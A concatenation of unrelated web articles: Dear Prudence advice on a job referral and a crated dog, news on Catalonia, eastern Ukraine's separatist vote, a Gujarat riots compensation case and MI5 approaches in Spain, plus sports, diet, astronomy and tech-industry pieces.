I have a friend, X, who recently graduated from school and is looking for a job. I work for a company that regularly hires people with X's, qualifications. X was telling me how tough it is to find work, so I suggested that I could put in a referral for him at my employer. Then another friend, Y, told me that she was an intern with him at another company. Y told me X was fired from the unpaid job because of his laziness and terrible work habits. He also alienated everyone else with his superior attitude. I have since heard similar things from others—X has a bad professional reputation. I don't want to jeopardize my own good reputation with my employer by recommending someone whom I believe won't do the job well. Is there a sensitive, tactful way I can tell him that I can't recommend him? And is there some other way I can help him out?
—Can't Recommend
Dear Can't,
You're right that you can't recommend someone who's been convincingly described as incompetent and poisonous by several reliable sources with no axe to grind. If you're a casual friend, you don't have to volunteer anything to him. Wait until he asks about the leads at your company. If X is as lazy as reputed, that may take care of it since he's not too motivated. If he does bring it up, then you have two choices, depending on how close you feel and how involved you want to get. You could say, “I'm afraid it turns out there's nothing at the company now that's right for you.” That's not a lie—there is nothing at your company for someone like X. But since he's young and possibly salvageable, you could also be blunt with him. Make a general statement that you heard he's had problems with the quality of his performance at previous jobs. Say there's no way he can get hired these days with less than stellar references, and he needs to do some remedial work. Suggest he get any kind of job in or out of your field and do well there so that his latest employer will give him a good recommendation. If he tries to pump you for where you heard about his problems or what was said, refuse to elaborate or divulge specifics. If you get any sense that he seems more interested in who reported him than in how he can repair his reputation, re-think your friendship.
—Prudie
Dear Prudence,
I work full-time and live alone. I recently had to crate my dog after she destroyed the carpet and other things in my apartment. She's doing fine now, although she doesn't enjoy being in the crate all day. I have a dog walker who takes her out at midday. My problem is that I feel guilty whenever I have plans in the evening after work. If I get off at 5 and meet friends at 7, I might not get home until 10. That means she'll be in the crate for over 12 hours. I feel like that's torture, so I make excuses to not meet friends. Do you have any suggestions that can ease my mind? I hate to use my dog as an excuse to not be social, but I just feel terrible thinking of her cooped up all day!
—Canine Conundrum
Dear Canine,
Crating your dog all day because she has separation anxiety is not only an inadequate solution to the problem of her being destructive; it is cruel. You need to find a trainer—look on a local pet listserv for recommendations—to help you work through this. One short walk at midday is not enough exercise or company for your pooch. Maybe there is a doggie day care facility where you can drop her off several days a week. She will get activity and socialization and come home tired and satisfied. On days when you are socializing, and you are entitled to a social life as much as your dog is, see whether you can come home first and give her a good walk. If not, hire a neighborhood kid to give her exercise, food, and companionship on the days you aren't coming home until late. All this will take effort and money, but that's an obligation you incurred when you got her. By keeping her in solitary confinement, you are punishing her for your choice to have a dog.
—Prudie
More Dear Prudence Columns
“Financial Affairs: I want to bequeath money to my mistress in my will. Is that wrong?” Posted March 24, 2011.
”A Fool for Love: My wife is super hot but dumb. How can I make the best of our union?” Posted March 17, 2011.
”I Can't Relate: My estranged half-sister wants to get to know me, but I'm afraid my parents won't approve.” Posted March 10, 2011.
”Diamonds Aren't a Girl's Best Friend: My ex is blackmailing me for sex. How can I get out of it?” Posted March 3, 2011.
More Dear Prudence Chat Transcripts
“This Baby Shower Is a Wash: Dear Prudence advises a reader who thinks her brother impregnated his girlfriend to steal her own baby's thunder—in a live chat at Washingtonpost.com.” Posted March 21, 2011.
”Teacher Gone Wild: Dear Prudence advises a schoolteacher caught on tape acting a drunken fool—in a live chat at Washingtonpost.com.” Posted March 14, 2011.
”Dead Letters at the Office: Prudie counsels an office worker who found love letters while cleaning out the desk of a recently deceased colleague that are not from her widower—and other advice-seekers.” Posted March 7, 2011.
”Nightmare Vacation: Prudie counsels a reader who regrets her promise to take an ailing family member to Disneyland—in this week's live chat.” Posted Feb. 28, 2011.
Like Prudie on the official Dear Prudence Facebook page and like Slate on Facebook. Follow us on Twitter.
UN officials are harshly criticizing the Spanish government's use of national police in their increasingly violent crackdown on Catalonia's upcoming referendum, warning they are violating fundamental rights that are basic to a democratic society.
The UN experts say that irrespective of the legality of the referendum itself, the Catalan public has the right to assemble publicly. They were also critical of cutting off websites, threatening the ability to debate and denying the public information.
Spain has shut down multiple websites and summoned multiple people to police stations on charges of having mirrored websites providing information on the October 1 referendum. Prosecutors have also threatened top Catalan officials with sedition charges, as well as threatening virtually all of the hundreds of Catalan mayors with charges for permitting the vote to take place.
Spanish officials have suggested they may have police physically prohibit voters from entering polling places, though local police warn this risks fueling public disorder. Catalan officials say the vote will go on as planned.
Last 5 posts by Jason Ditz
After scientists recommended eating 800g a day to prevent early death, readers tell us how they get so much greens in their diet
Forget five a day, now it's all about getting 10 portions of fruit and vegetables into your diet. That is according to scientists who say doing this could prevent up to 7.8 million premature deaths worldwide.
But how do you make sure you get your 10 a day (about 800g of fruit and veg)? We asked those of you who already consume this amount. Here is a selection of responses.
Jenny Broomfield 27, from Oxfordshire – ‘Cook from scratch. If you do that it will allow you to pack vegetables in'
It's not a big deal at all. I started eating more greens after joining Weight Watchers. On this diet you are allowed to eat as much fruit and vegetables as you like, it's not included in your daily points you have to eat within. That encouraged me to pack everything full of vegetables. I had 10 or more portions (if not more) a day. Now I no longer follow that plan to the letter but I have developed good eating habits that stayed with me. I have lost over four-and-a-half stone.
I buy a lot of vegetables and put them into what I eat. I don't even think about it any more. For example, on Saturday night I had a pasta bake with four peppers, massive courgettes, mushrooms and onions and not much pasta. That was low calorie and five portions of vegetables all in one meal.
I do still eat meat but have smaller portions of it now. I snack on fruit as well, so I eat cherry tomatoes, satsumas, pineapples, that sort of thing. My advice is to cook from scratch. If you do that it will allow you to pack vegetables into every meal. Meals such as lasagnes, shepherd's pie, curries – even pizzas – can be loaded up with delicious veg. It's worth it because as well as the added vitamins the likelihood is you will be consuming fewer calories. Also vegetables are so much cheaper, which is incentive enough.
Adam Marks, 37, from Bristol – ‘Invest in a smoothie maker'
I'm vegetarian, but this doesn't mean I only eat vegetables. Most of my diet is protein-heavy stuff like Quorn, tofu and other soya products. So getting vegetables into every meal can be a struggle. But having said that, I've recently discovered an easy way to do it: homemade smoothies. I usually have one for my lunch using a 600ml bottle. It might not sound like much but it's surprisingly filling. Plus, it's an easy way to get at least five portions of fruit and veg a day. If I'm still hungry in the afternoon, I have a handful of nuts or seeds. The rest of my intake comes from other meals. I usually have an apple with my breakfast toast, and a good-sized amount of leafy greens or broccoli with dinner.
People forget that a “portion” of fruit and veg is not a huge amount. For example, 80g of banana is a pretty small banana. The same amount of blueberries is a little handful. You don't have to hide the rest of your food. And best of all, it's cheap.
I adopt this way of eating for health reasons mainly, and also for weight control. Eating a good amount of vegetables with a meal means you need less fatty or carbohydrate-rich foods on the same plate to feel full. My favourite smoothie includes bananas, blueberries, fresh baby spinach, cucumber, strawberries and raspberries. I mix it up with some skimmed milk. I judge the size of each portion by eye, having weighed them roughly the first time I made it.
It's best to introduce vegetables gradually. Try substituting them into recipes instead of things like potatoes. You'll feel just as full, but it'll be way healthier. At some point it will become second nature. Oh and buy a smoothie maker.
Rakin Choudhury, 23, from Hull – ‘I would say prepare your meals in advance as much as you can'
I am dedicated with fitness and try to prepare meals in advance, so I incorporate a lot of vegetables. I would count fruit as dessert. I started eating more healthily a couple of years ago when I left a long-term relationship. I was unhappy with my weight so I decided to change my diet and gym routine. It took a while to get the balance right as it can be expensive. It's much cheaper if you get frozen fruit and vegetables. It's routine now, I don't think about it. When my office has McDonald's Fridays I have a sandwich or porridge. It's normal to me now.
Facebook Twitter Pinterest Rakin Choudhury prepares all his food for the week on Sunday. Photograph: Rakin Choudhury
To try to get more vegetables and fruit in your diet I would say prepare your meals in advance if you can. That's what I do. I prepare all my food for the week on Sunday. Also if you are having pasta, have a salad with it. Or eat an apple with breakfast. It's as simple as that. Another way to get enough good stuff in is by making smoothies. Ten portions a day sounds daunting but it's not. I feel great for it.
Cathy, 60 from the Thames Ditton – ‘My advice is don't buy processed foods'
I have always eaten a lot of fruit and vegetables. In an average day I have a banana and blueberries in my porridge, an apple or pear and nuts as a snack. Then lunch is a salad of mixed coloured lettuce, cherry tomatoes etc and either chicken breast or salmon. I will snack on an apple afterwards. Late afternoon I have some nuts and dried fruits (cranberries or maybe some strawberries in season). Then for dinner I eat meat and broccoli and carrots, or kale and carrots, followed by melon and orange cut up as a fruit salad. I make that about 10 portions.
Facebook Twitter Pinterest Fruit and nuts are a popular snack. Photograph: Alamy
My weakness is cake and chocolate so my diet is liberally sprinkled with these plus spoonfuls of peanut butter and honey.
I don't believe in measuring. Fruit tends to come in convenient meal-size portions ready-made (a pear, apple, banana etc). With vegetables I just fill my plate up, it's not rocket science.
If I have a bad day eating with loads of bread, cakes and sweets I feel horrible mentally and physically. I still do it though sometimes.
Fruit and veg are cheap so I don't know why people don't buy more. I'm driven by my determination to stay active and healthy well into old age. My advice is don't buy processed foods.
Tamraparni Dasu, 55, from New Jersey, US – ‘The food I grew up with was centred around vegetables'
My mother was a terrific cook, and coming from the Andhra region of India, we ate three- to four-course meals, each with a different type of vegetable dish. Every celebration included multiple courses. When I got married, I was introduced to a whole new cuisine, also vegetarian, from Palghat [a city in southern India]. And when none of the restaurants could match the quality of my mother and mother-in-law's cooking, I was forced to strike out on my own and start experimenting with recipes.
Breakfast for me is usually chapati or toast with a leftover veggie dish, like curried cauliflower. I snack on almonds and fruit. I go a bit of fruit crazy, sometimes eating an entire bunch of grapes. Lunch is usually a big bowl of fruit and vegetables in a salad and then dinner will be chapati or rice and maybe eggplant or another vegetable dish.
I feel healthy and energetic, and attribute my good skin and hair to eating lots of fruit and vegetables. My advice is always cooked at home, buy fresh produce every week (daily is hard for most of us working shifts). We cook together as a family and friends and it makes it more fun. There are lots of resources for vegetarian cooking, which have exploded in the last decade. Variety is important so improvise from as many cuisines as possible (Italian, Chinese, Mexican, all south Asian and east Asian). Improvise and it is OK to fail, scrape off the burnt broccoli and move on.
Anonymous, from north Wales – ‘I add vegetables to add flavour but also to add bulk and nutrients cheaply'
I get 10 portions a day. I have to work to a tight budget but also cooking is something I enjoy and take pride in. I cook our evening meals myself and while I enjoy trying out recipes I mostly cook standard stuff, such as spaghetti bolognese or stews. I add a variety of vegetables to every meal both to add flavour but also to add bulk and nutrients cheaply.
My spaghetti bolognese recipe, for instance, includes chopped onion, garlic, a red pepper and a tin of tomatoes. Also maybe a stick of celery, carrot or a handful of mushrooms chopped and sweated with the onion to start with. I do the same sort of thing with my stews and curries. I add in a bit of whatever vegetable I have to hand. I use my slow cooker a lot and that means the vegetable cooks down nicely to become part of a delicious sauce. A couple of sweet potatoes added to anything like that are delicious.
The key to getting it done is to not see it as a chore or a big thing. Just grab a glass of orange juice with breakfast. Or a cheese or ham salad sandwich with lettuce, tomato and cucumber for lunch. Then snack on a banana. Throw lots of vegetable in your dinner with apple pie to follow. There, you've had your 10 portions without even realising.
The Supreme Court bench was hearing a petition filed by the Gujarat Government challenging the 2012 order of the High Court directing it to pay compensation to over 500 shrines damaged during the post-Godhra riots.
The Supreme Court questioned on Wednesday a Gujarat High Court order, directing the state government to use taxpayers' money to restore and rebuild religious sites damaged in the 2002 riots.
Advertising
A bench of Justices Dipak Misra and P C Pant wondered if it would be proper in a secular State to order compensation for rebuilding places of worship.
It observed: “Money is required for economic growth… individual injury is a different thing where compensation is granted under Article 21 (right to life and liberty) of the Constitution. Can it happen in a diversified country that a state is distributing public money to build religious places?”
The bench is hearing an appeal by the Gujarat government against the high court order, asking the state to quantify the damage caused to religious places during the riots and disburse money to rebuild them.
Appearing for Gujarat, Additional Solicitor General Tushar Mehta asserted that tax payers' money cannot be used for restoration or construction of any religious place since that would be in the teeth of the Constitution.
Citing Article 27 in the Constitution, Mehta said there is a specific prohibition against compelling people “to pay any taxes, the proceeds of which are specifically appropriated in payment of expenses for the promotion or maintenance of any particular religion or religious denomination”.
Advertising
He reasoned that a judicial order will be against the secular fabric of the country even if it orders use of public money for construction of places of worship for all religions. “What is prohibited, therefore, is use of state fund, which consists of payment of various taxes by citizens, for repair /reconstruction/construction of any place of worship of any religion,” said Mehta, asking the top court to set aside the high court order.
Get the biggest Spurs stories by email Subscribe Thank you for subscribing See our privacy notice Could not subscribe, try again later Invalid Email
The noise
There's no sound louder in London than that heard in and around White Hart Lane when it's rocking. The loss of one corner this season hasn't stopped that noise echoing around and the final north London derby showcased that perfectly as Arsenal were blown away, not just by Spurs' performance but by the sound coming from the stands.
Many fans, even begrudging Gunners ones, admit that the Lane has one of, if not the, the best atmosphere in the Premier League.
The sight of that grass when you walk up the steps from inside the stadium
A bit of a personal one here, but as a child the sight that always used to give me goosebumps was emerging from the darkness of the bowels of the stadium, up the concrete steps and seeing that gleaming green grass of home spread out before you.
That thrill has never gone and while the new stadium will have its own wonderful turf view of course as you emerge to head towards your seat, the relative darkness of the inside of White Hart Lane is what makes its pitch look even brighter and the new ground is unlikely to replicate that.
The entrance where the players drive in
This has changed a bit over recent years, due to building work and alterations to the main car park entrance, but for years it has been the main entrance off the High Street.
The fans knew in their heart of hearts that no player was allowed to stop to sign autographs due to the chaos it would create, but that never stops them lining the pavement to catch just a glimpse of their heroes in their expensive cars.
I still remember seeing Jermain Defoe's face when he pulled his car out after a game a few seasons ago into the High Street, but only managed to move five yards before the lights turned red and he was stuck in a line of traffic. The fans swarmed around his car and to be fair the little striker puts his window down and signed as many autographs as he could before the traffic moved.
Those tight turnstiles
As a child, nothing was as thrilling and intimidating in equal measure as the White Hart Lane turnstiles, with my dad ushering me forward to head on through ahead of him.
They are not for the faint-hearted or those with claustrophobia or extra large beer guts. Clearly those in previous years were of a thinner nature as fitting through those turnstiles feels like squeezing between the bars of a jail cell. It was always worth it though.
The old fashioned exterior walls of the Lane
Yes, they look dated nowadays but those stadium walls are part of the fabric of Tottenham. In an area of the capital that isn't exactly packed full of landmarks, walking down the High Street and suddenly coming across the big, iconic ground, tucked between other building, couldn't help but get the heart beating that little bit faster.
It's an arena that harks back to the old days of football, the pre-Premier League era when it wasn't all about the show, and more about the game.
The fact that if you stood at the right angle down Park Lane you could just about see the pitch on non-match days was something that few other top flight grounds offered.
Yes, the new stadium will look stunning with its perfect bowl but no Spurs fans will forget what it was like to walk around the Lane to reach their turnstile.
The Spurs megastore
Of course there will be a brand spanking, gleaming new superstore at the new stadium but the old shop was a staple part of a visit to White Hart Lane.
Whether you went in before or after the game - my dad used to always take us in afterwards - many a parent will have been left with a lighter wallet after wandering up and down those aisles for ages.
Especially if Spurs had won the match, fans would lap it all up - replica shirts, training tops, posters, collectibles and kids' toys galore. Of course it was all part of the merchandise machine, but that old store on the corner of the Lane holds plenty of memories.
The two cockerels
Simply iconic. The prettiest birds in Tottenham have sat proudly for years on top of the East and West Stands and will always be the perfect symbols of White Hart Lane.
The club have said the golden cockerels will be coming across to their new home but it seems unlikely they will appear on the stadium anywhere, especially on the roof. They are more likely to end up in The Tottenham Experience, the new club museum.
Like the bust of Bill Nicholson, the old stadium gates and the restored club clock, the two cockerels will always be a special part of Tottenham history even if they will not be standing tall any more.
Those European glory glory nights
The switch to Wembley last season only made fans realise that little bit more how special European nights at the Lane have always been. Even 90,000 Lilywhites at the national stadium cannot replicate the feeling of those special evenings under the lights.
European football disappeared from the menu for a couple of decades at Spurs, but has returned in the last decade and watching Gareth Bale destroy reigning Champions League champions Inter Milan on the turf was one of those games that brought back memories of days gone by.
Spurs will spend another season at Wembley for their European and domestic games and need to ensure they return to their new ground with Champions League football on their plate once again.
With the design of the new ground, everything has been done to ensure that with the fans being so close to the pitch and the sound rolling around the perfectly designed stands.
A whole new set of special nights will be played out in front of the Spurs supporters, no doubt with an echo of glory drifting across from where that wonderful old stadium once stood.
Pro-Russian separatists defied international criticism by holding elections on November 2 in areas under their control in eastern Ukraine.
Residents in separatist-controlled areas voted for leaders and so-called "people's councils" for their "people's republics."
Russia's Interfax news agency, citing an exit poll, said that in the "Donetsk People's Republic," incumbent leader Aleksandr Zakharchenko was expected to win with 81 percent.
Results from neighboring Luhansk, however, were expected later because some polling stations remained open.
The leader of the "Luhansk People's Republic," Igor Plotnitsky, is widely expected to win.
The early results came as Ukrainian President Petro Poroshenko called on Russia to denounce the vote.
In an online statement, Poroshenko described the elections as a "farce, [conducted] under the barrels of tanks and machine guns."
He added: "I count on Russia not to recognize the so-called elections because they are a clear violation of the September 5 Minsk protocol, which was also signed by Russia's representative."
In a statement, European Union foreign policy chief Federica Mogherini called the vote an "obstacle to peace" and said the EU will not recognize the elections.
But the Russian Foreign Ministry said it "respects the will of the people of southeast" Ukraine.
"The elected representatives received a mandate to solve the practical tasks regarding the restoration of normal life in the regions," Interfax quoted the ministry as saying.
Ukraine's Security Service said the vote violates Ukraine's constitution and resembles an illegal “power grab.”
It also announced that it has opened a “criminal probe” against the organizers of the vote.
Earlier on November 2, Ukrainian military spokesman Andriy Lysenko said Russia had launched an “intensive deployment of military equipment and personnel” from Russian territory into parts of eastern Ukraine that are controlled by pro-Russian separatists.
AFP reporters near Donetsk said they saw a military column of about 20 trucks, some carrying antiaircraft guns, heading toward the government-held airport, although it was not clear whether they were new forces.
Several other Western media outlets also reported witnessing heavy movements of troops near Donetsk.
Among them, reporters for the news sites Buzzfeed and Mashable tweeted that they had seen a large military column.
Buzzfeed's Max Seddon wrote: "31 unmarked Kamazes (military trucks) just drove past towards Donetsk. Anti-aircraft weapons, ammunition boxes, radar systems, a bus of gunmen."
In Donetsk, correspondents reported pro-Russian gunmen inside and outside several polling stations as voters were casting ballots.
The Ukrainian government, the United States, the European Union, other Western countries, and UN Secretary-General Ban Ki-moon have said the November 2 elections are illegitimate and will not be recognized.
The elections were not regulated by Ukrainian law or overseen by the Ukrainian Central Election Commission.
The vote was not observed by international monitors from bodies such as the Organization for Security and Cooperation in Europe (OSCE), but separatist officials claimed they had between 30 and 70 observers from several foreign countries and places like the breakaway Georgian republic of Abkhazia.
Russian Foreign Minister Sergei Lavrov said Moscow will "of course recognize the results" of the elections.
ATLANTA -- Injuries and matchup concerns have the Atlanta Hawks considering multiple changes to their starting lineup for Monday's playoff series opener against the Chicago Bulls.
As the Hawks wrapped up practice Sunday and left Philips Arena to board the team's flight to Chicago, coach Larry Drew said he had yet to settle on a replacement for injured starter Kirk Hinrich at point guard. Drew also hinted at possible changes at small forward and center.
The adjustments are partly the result of the Hawks shifting their focus from defending Orlando Magic center Dwight Howard in the frist round to now facing explosive Bulls guard Derrick Rose in the conference semifinals.
"We're looking at different things [and] we have not decided yet," Drew said. "We'll go through a walk-through [practice] and look at some other things, but we haven't sorted it out. I'm just going on feel right now. Obviously, against this Bulls team, we're not facing Dwight Howard."
Rose, the frontrunner for the league's MVP award, presents his own set of headaches for the Hawks, who are expected to be without their best defensive guard in Hinrich for the entire series as he recovers from a severely strained right hamstring.
The Hawks have practiced for two days with both Jeff Teague and Jamal Crawford getting work with the first-team at point guard.
Teague has averaged 5.2 points and 2.0 assists per game in his second NBA season. He started seven games this season, including a stretch in February when the Hawks traded Mike Bibby and acquired Hinrich.
Drew would prefer to keep Crawford coming off the bench, where he thrived against Orlando and led the Hawks in scoring at 20.5 points a game in the 4-2 series victory.
"The decision that I have to kind of ponder is whether to disrupt what we do off the bench versus just going back and starting [Crawford]," Drew said. "The last few days, we've looked at both situations. The things we've done, we've used them in the starting lineup and out of the starting lineup."
The Hawks could also go with a smaller lineup that would re-insert Marvin Williams at small forward, shift Josh Smith to power forward and open with Al Horford at center. To accommodate defensively for Howard, the Hawks started Smith at small forward, Horford at power forward and veteran Jason Collins at center against Orlando.
The Hawks have routinely made adjustments on the fly, using 17 different starting lineups this season. Atlanta has seven players who have started at least 22 games.
Hinrich, who sustained the injury in the fourth quarter of Thursday's series-clinching win against Orlando, traveled with the team to Chicago but is listed as doubtful. Drew said Sunday he doesn't expect Hinrich to be available at any point in the series.
"He does look like he's walking better," Drew said. "Kirk is a tough guy. What I was told, going into this series and hearing how the injury was, me personally, I'm not looking for him to come back."
Michael Wallace covers the NBA for ESPN.com.
The globular star cluster Omega Centauri has caught the attention of sky watchers ever since the ancient astronomer Ptolemy first catalogued it 2,000 years ago. Ptolemy, however, thought Omega Centauri was a single star. He didn't know that the "star" was actually a beehive swarm of nearly 10 million stars, all orbiting a common center of gravity.
The stars are so tightly crammed together that astronomers had to wait for the powerful vision of NASA's Hubble Space Telescope to peer deep into the core of the "beehive" and resolve individual stars. Hubble's vision is so sharp it can even measure the motion of many of these stars, and over a relatively short span of time.
A precise measurement of star motions in giant clusters can yield insights into how stellar groupings formed in the early universe, and whether an "intermediate mass" black hole, one roughly 10,000 times as massive as our Sun, might be lurking among the stars.
Analyzing archived images taken over a four-year period by Hubble's Advanced Camera for Surveys, astronomers have made the most accurate measurements yet of the motions of more than 100,000 cluster inhabitants, the largest survey to date to study the movement of stars in any cluster.
"It takes high-speed, sophisticated computer programs to measure the tiny shifts in the positions of the stars that occur in only four years' time," says astronomer Jay Anderson of the Space Telescope Science Institute in Baltimore, Md., who conducted the study with fellow Institute astronomer Roeland van der Marel. "Ultimately, though, it is Hubble's razor-sharp vision that is the key to our ability to measure stellar motions in this cluster."
Adds van der Marel: "With Hubble, you can wait three or four years and detect the motions of the stars more accurately than if you had waited 50 years on a ground-based telescope."
The astronomers used the Hubble images, which were taken in 2002 and 2006, to make a movie simulation of the frenzied motion of the cluster's stars. The movie shows the stars' projected migration over the next 10,000 years.
Identified as a globular star cluster in 1867, Omega Centauri is one of roughly 150 such clusters in our Milky Way Galaxy. The behemoth stellar grouping is the biggest and brightest globular cluster in the Milky Way, and one of the few that can be seen by the unaided eye. Located in the constellation Centaurus, Omega Centauri is viewable in the southern skies.
Twitter is looking to boost its appeal to brands by introducing interactive advertising and high quality live video content.
Twitter wants marketers to see it as more than 140 characters as it focuses on providing more ways for brands to reach consumers.
That started with the introduction of Twitter Moments and continues with a more global focus on live videos, aimed at enabling brands to “express themselves” on a wider scale.
The focus for video is on sport, entertainment and politics and will include live Twitter streams that allow users to get involved, critique and comment on events or brand videos.
Twitter has developed its video platform Periscope so that the streaming service works from TV production technology, not just through phones. It has also made its other ad formats, including Amplify and Niche, more accessible to brands by working on their quality to appeal to higher end brands, including Louis Vuitton.
David Wilding, director of planning at Twitter UK, told Marketing Week at Twitter's IAB UK Upfronts event today (20 October) that video, which is already a primary focus in the US with the political debates between Donald Trump and Hilary Clinton and the NFL sporting series, will now be pushed out globally. The company said it saw a 30% uplift in viewers between the first and second debates, with stats from the third debate last night yet to come through.
“The biggest misconception is character limit and a limit to creativity. But we are overcoming that and more brands are seeing our potential.” David Wilding, director of planning, Twitter UK
Wilding said the biggest barrier to brands doing more on Twitter in the past has been not knowing what to do if they are more serious or “not a fun brand”.
“The biggest barrier has been, how do I express myself on Twitter if I'm not funny and I'm not Innocent Drinks, who can say something witty within 140 characters. How do I use Twitter?” he said.
Wilding believes Twitter now has much more on offer for brands including its recent work on interactive advertising. This includes its campaign for the British Heart Foundation, which saw people receive different responses when they ‘liked' a tweet to highlight that only one in 10 people who have heart attacks outside hospital survive.
And today it has a launched a ‘#PartnerUp' campaign with Microsoft's Xbox console that partners up “likeminded” gamers on Twitter.
Wilding says interactive advertising is a key strategy for brands as it is a great way to target customers interested in what is happening. Twitter also highlighted that its users are the first to hear about news, with 70% of them hearing something through Twitter before other platforms.
“Everything at Twitter comes down to two words, ‘what's happening'. Brands recognise that if they can capture people who are interested in what is happening, they can spread their message to other people. Interactive is a good way to get people's attention,” Wilding commented.
Wilding said that one of the criticisms Twitter has received from its live video has been that it is not easy to discover. He said that this is something the company is working on and that developments such as the “While you're away” feature help users find relevant and interesting content more easily.
DETROIT -- Chris Chelios flirted with the idea of coming out of retirement and playing in the KHL, but the future, sure-bet Hockey Hall of Famer has decided against it. He won't be going to Russia.
"No, I'm not," Chelios told ESPN.com while sitting in his office at Joe Louis Arena on Thursday. "Honestly, I had an agent here two weeks ago and he had mentioned that two teams over there were looking for defensemen. I said, 'Well, go ahead and ask.' I never really got a real offer and to be honest, it wasn't too realistic for me to go over there. I'm having too much fun here watching my own kids.
"I had a plan to go over there but now I'm content with what I'm doing."
Chelios, 47, is enjoying his new job as advisor to hockey operations with the Wings, taking over Steve Yzerman's old office at Joe Louis Arena and working mostly with Detroit's minor league players in Grand Rapids of the AHL. The fire still burns to play, but when he got a brief stint with the Atlanta Thrashers last season, he realized it was time to retire.
"I made my decision," Chelios said. "Atlanta didn't work out last year and I found out I didn't want to be anywhere else other than Detroit and play 10 minutes a game. For Detroit, I would do it tomorrow, because my family is here. Maybe Chicago [his hometown]. But otherwise, there's no place I would want to accept that kind of role other than here."
Pierre LeBrun covers the NHL for ESPN.com.
Folks looking for something good to eat have never had to look far in New Jersey.
For years, a rich mix of diners, drive-ins, ice cream shops and luncheonettes have lined the roads that cut through the state. And, small, family-owned food stores have dotted neighborhoods for more than a century.
It's safe to say that the first roadside eateries in New Jersey sprang up not far behind the road-makers. But while the state is deservedly famous for its diners, the variety of vittle vendors and the range of products offered was, and continues to be, more than enough to please any palate.
The history of New Jersey is replete with things to eat. Here's a look at a variety of places folks from one end of the state to the other could visit to satisfy a taste for just about anything. Be sure to click on the captions button to learn even more about the photos.
(Editor's note: this is a contribution from Thomas Kösters, an entrepreneurship professional with the Technische Universität München and co-founder of the European Startup Initiative)
It's interesting that Google chairman Eric Schmidt recently published an article in German media defending his company's operations. In it, he lamented that many pundits (especially German ones) “attack the entire Internet and its magic, which gives anyone, anywhere access to previously hard-to-find information.”
While I understand that as the executive chairman of Google, it's expected that he react to attacks in this fashion, I also believe the criticism the company has received is good.
Now don't get me wrong – I don't think Google should be used as a scapegoat, but I do believe there needs to be a discussion on how the Internet and digitalization are affecting our privacy rights.
So, I'm glad that Schmidt has entered into the public sphere for debate.
The times they are a-changing
Digitalization is essentially the conversion of physical objects into digital ones – everything becomes data. As a result of the conveniences that come with it, it seems we are all incessantly giving away valuable information about our personal and professional lives.
In fact, it's often difficult to see the real costs of these data packages we use to pay for “free” services, and where this data is going
Mathias Döpfner, CEO of Europe's largest newspaper publisher Axel Springer, summarized the significance of the digital revolution by saying: “If fossil fuels were the fuels of the 20th century, then those of the 21st century are surely data and user profiles.”
In an open letter to Eric Schmidt, Döpfner argued that Google and others are becoming “new digital super-authorities”, which pose as a danger in extracting themselves from the reach of regulation. He even went so far as to openly admitting being afraid of their power.
No wonder he's afraid though, the Internet infrastructure reaches much further than the jurisdiction of a single nation state or even the European Union. Plus, the core values of the free world (like freedom of expression) largely forbid any limitations of this free flow of data.
In fact, democratic institutions fight with conviction for the preservation and expansion of what is the basis of Google's business.
Growing power of Internet giants across borders
The debate on deterritorialization and the loss of the power of the nation state vis-a-vis multinational companies that can blackmail governments by moving to another location are old and, I believe, inaccurate.
If anything, Google's campus in Palo Alto is a clear sign of the indispensable link between business and territoriality. Companies thrive on communities and profit from localities, where talent and information is abundant, and this doesn't just hold true in the Valley.
That said, governments will always have a grasp on companies as they grant access to markets and set rules of doing business (European tech startups may know this too well).
However, the costs of regulating markets vary and democracies have not yet adopted the new price list. We are used to using political capital to fight unemployment or to protect the environment – but to keep the Internet open? Or to strike the fine balance between protecting digital privacy rights and enabling technological innovation to boost the startup economy?
No wonder attempts to find political answers have been clumsy, at best.
In his letter, Döpfner took it upon himself to reprimand the work of European competition regulators, who reached an agreement with Google over the EU anti-trust inquiry, and said, “Will European politicians fold or wake up? Institutions in Brussels have never been as important as they are now.”
In another instance, to protect privacy rights, the EU set out to regulate the use of cookies, forgetting that Google and Amazon algorithms work quite well without. To top this off, the negotiated terms between the EU and Google are only binding for its EU web domains and not for apps installed on smartphones.
Still, the notion that Google, Apple or Facebook are like infrastructure providers similar to the railroad companies of the past is not completely far-fetched. They function in the same manner: Once you put your wagon on its rails, it's hard to switch. But if you don't put them there, your goods will never make it to the market.
So this begs the question: Are the digital infrastructure providers abusing their market domination to restrict access to their networks, the market?
No easy answers
It's also important to ask ourselves: Without the railroad – where would we stand today?
Clearly, Google is not only taking. As Schmidt wrote:
The German Institute for the Economy states for the years between 2007 – 2011 that more than 28,000 small companies have been founded in Germany with the help of Google products. Those new companies stand for an annual revenue of more than 8 billion euros and almost 100,000 jobs giving clear proof of the economic power of the web and of Google's contribution to the German economy
I know what he is talking about – Google functions as a resource for many startups since it's making data widely available that couldn't have been aggregated otherwise.
The digital revolution, spearheaded by these Internet giants, affects every stone in our society – from industrial production to social interaction.
Digitalization is a huge opportunity and I agree with Satya Nadella, Microsoft's new CEO, who stated in a recent blog post:
The opportunity we have in this new world is to find a way of catalyzing this data exhaust from ubiquitous computing and converting it into fuel… This fuel will power improved experiences, understanding and interactions. When these devices around us gain the capacity to listen to us, respond to us, understand us and act on our behalf, we enter into an entirely new era.
To live (survive?) in this new era of data, he called for “a data culture for everyone”.
But what I want to understand from this, are both the benefits and dangers of technological use as well as their implications. And we cannot have a meaningful debate without the main players explaining their role.
So, please Mr. Schmidt, Mr. Zuckerberg, Mr. Nadella, Mr. Page and Mr. Cook, continue the debate.
For more Tech.eu content, please subscribe to our weekly newsletter, on Twitter and on Facebook.
Featured image credit: Gil C / Shutterstock
A Dungiven man claims he's been approached by MI5 six times in the past two years and asked to work as an informant.
The 52-years-old, who spoke exclusively to the ‘Journal', said the same two officers from the British security service made the approaches while he was on holiday in Spain.
The man, who doesn't wish to be identified, said: “They think I'm a terrorist and I deny that.”
Over the past two years, he claimed the two officers had asked him repeatedly to work for MI5.
“They've said, ‘name your price' or ‘we'll buy you a villa.'
“It's like something out of a movie; it's something I could do without. They're like ghosts. They disappear as soon as they appear.
“They've come up behind me on the street, or when I was walking to the beach. It's always when I've been without my wife; when I'm on my own, so they must have been watching my apartment.
“They identify themselves as MI5 officers and they're able to tell me when I was last in Spain. They ask me if I had information on senior republicans in Derry and would say ‘you're close to them. I've told them they're following the wrong guy, but they keep going.”
The man said the most recent approach was made just before the New Year in Spain. He was arrested by Spanish police twice inside six days - at the airport on arrival and during his stay. He was told that, based on British intelligence, he was a threat to the country and he could be removed from Spain.
After the second arrest, the same two MI5 officers appeared and questioned him. Again, he claimed, they asked if he would work for them.
